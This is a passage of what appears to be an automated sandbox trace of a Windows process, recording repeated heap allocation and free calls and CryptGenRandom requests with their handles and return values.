| out: hHeap=0x2b0000) returned 1 [0033.377] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e96d0 | out: hHeap=0x2b0000) returned 1 [0033.377] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8c20 | out: hHeap=0x2b0000) returned 1 [0033.377] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8cb0 | out: hHeap=0x2b0000) returned 1 [0033.377] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8d40 | out: hHeap=0x2b0000) returned 1 [0033.377] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8dd0 | out: hHeap=0x2b0000) returned 1 [0033.377] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8e60 | out: hHeap=0x2b0000) returned 1 [0033.377] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8ef0 | out: hHeap=0x2b0000) returned 1 [0033.377] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8f80 | out: hHeap=0x2b0000) returned 1 [0033.377] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9010 | out: hHeap=0x2b0000) returned 1 [0033.377] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e90a0 | out: hHeap=0x2b0000) returned 1 [0033.377] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9130 | out: hHeap=0x2b0000) returned 1 [0033.377] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e91c0 | out: hHeap=0x2b0000) returned 1 [0033.377] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9250 | out: hHeap=0x2b0000) returned 1 [0033.377] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e92e0 | out: hHeap=0x2b0000) returned 1 [0033.377] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9370 | out: hHeap=0x2b0000) returned 1 [0033.377] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9400 | out: hHeap=0x2b0000) returned 1 [0033.377] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9490 | out: hHeap=0x2b0000) returned 1 [0033.377] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9520 | out: hHeap=0x2b0000) returned 1 [0033.378] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e95b0 | out: hHeap=0x2b0000) returned 1 [0033.378] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eaf60 | out: hHeap=0x2b0000) returned 1 [0033.378] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eac08 | out: hHeap=0x2b0000) returned 1 [0033.378] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eac90 | out: hHeap=0x2b0000) returned 1 [0033.378] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9640 | out: hHeap=0x2b0000) returned 1 [0033.378] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb078 | out: hHeap=0x2b0000) returned 1 [0033.378] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.379] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.379] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.379] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.380] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.380] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.380] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.381] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.381] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.381] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.382] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.382] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.382] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.382] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.382] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.383] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.383] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.383] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.383] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.384] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.384] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.384] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.385] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.385] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.385] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.386] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.386] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.386] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.386] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.386] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.387] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.387] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.387] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.387] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.388] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.388] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.388] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.389] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.389] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.389] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.390] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.390] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.390] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.391] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.391] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.391] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.391] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.391] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.392] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.392] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.392] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.392] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.393] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.393] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.393] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2eac08 [0033.393] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2eac90 [0033.393] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2e6bf8 [0033.393] CryptAcquireContextW (in: phProv=0x2ad724, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad724*=0x2e6c80) returned 1 [0033.394] CryptGenRandom (in: hProv=0x2e6c80, dwLen=0x80, pbBuffer=0x2ad738 | out: pbBuffer=0x2ad738) returned 1 [0033.394] CryptReleaseContext (hProv=0x2e6c80, dwFlags=0x0) returned 1 [0033.394] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9640 [0033.394] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e6bf8 | out: hHeap=0x2b0000) returned 1 [0033.394] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e95b0 [0033.394] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x108) returned 0x2eb078 [0033.394] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x4) returned 0x2e7d08 [0033.394] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eaf60 [0033.394] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.394] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2ead30 [0033.394] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2e6bf8 [0033.394] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x10c) returned 0x2ecd18 [0033.394] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.394] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xc) returned 0x2bef88 [0033.394] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9520 [0033.394] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e6bf8 | out: hHeap=0x2b0000) returned 1 [0033.394] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eae48 [0033.395] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9520 | out: hHeap=0x2b0000) returned 1 [0033.395] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.395] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xc) returned 0x2befa0 [0033.395] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.395] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.395] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.395] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.395] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x88) returned 0x2e9520 [0033.395] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2befa0 | out: hHeap=0x2b0000) returned 1 [0033.395] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eb190 [0033.395] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9520 | out: hHeap=0x2b0000) returned 1 [0033.395] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.395] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.395] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.395] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.395] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.395] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.395] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.395] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.395] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.395] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.395] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.395] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.395] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.395] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.395] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.395] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.395] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.395] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.395] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.395] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.395] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.395] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.395] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.395] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.395] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.395] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.396] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.396] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.396] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.396] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.396] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.396] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.396] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.396] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.396] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.396] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.396] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.396] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.396] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.396] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.396] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.396] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.396] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.396] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.396] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.396] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.396] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.396] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.396] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.396] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.396] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.396] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.396] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.396] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.396] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.396] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.396] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.396] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.396] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.400] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.400] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.400] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.400] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.401] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.401] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.401] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.402] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.402] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.402] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.403] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.403] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.403] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.403] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.403] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.404] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.404] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.404] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.404] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.405] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.405] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.405] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.406] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.406] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.406] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.407] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.407] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.407] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.408] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.408] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.408] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.408] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.408] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.409] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.409] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.409] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.410] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.410] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.410] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.410] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.411] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.411] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.411] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.412] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.412] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.412] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.413] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.413] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.413] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.413] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.413] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.414] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, 